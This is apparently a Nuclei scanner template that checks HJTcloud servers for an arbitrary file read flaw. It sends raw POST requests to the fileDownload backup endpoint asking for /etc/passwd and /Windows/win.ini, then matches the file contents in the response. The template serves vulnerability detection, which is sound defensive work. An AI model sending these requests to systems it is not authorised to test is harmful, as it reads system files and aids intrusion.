id: hjtcloud-arbitrary-file-read

info:
  name: HJTcloud Arbitrary File Read
  author: pikpikcu
  severity: high
  reference:
    - https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
  tags: hjtcloud,lfi

requests:
  - raw:
      - |
        POST /fileDownload?action=downloadBackupFile HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        fullPath=/etc/passwd

      - |
        POST /fileDownload?action=downloadBackupFile HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        fullPath=/Windows/win.ini

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
          - "bit app support"
        condition: or

      - type: status
        status:
          - 200
